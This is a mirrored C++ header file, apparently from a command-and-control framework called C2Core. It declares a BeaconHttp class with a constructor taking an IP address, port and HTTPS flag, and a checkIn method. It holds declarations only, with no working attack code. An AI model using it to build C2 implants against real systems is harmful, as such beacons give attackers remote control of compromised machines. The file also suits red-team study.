mirror of
https://github.com/maxDcb/C2Core
synced 2026-06-08 15:48:01 +00:00
23 lines
295 B
C++
23 lines
295 B
C++
#pragma once
|
|
|
|
#include "Beacon.hpp"
|
|
|
|
|
|
class BeaconHttp : public Beacon
|
|
{
|
|
|
|
public:
|
|
BeaconHttp(std::string& config, std::string& ip, int port, bool https=false);
|
|
~BeaconHttp();
|
|
|
|
void checkIn();
|
|
|
|
private:
|
|
std::string m_ip;
|
|
int m_port;
|
|
|
|
nlohmann::json m_beaconHttpConfig;
|
|
bool m_isHttps;
|
|
|
|
};
|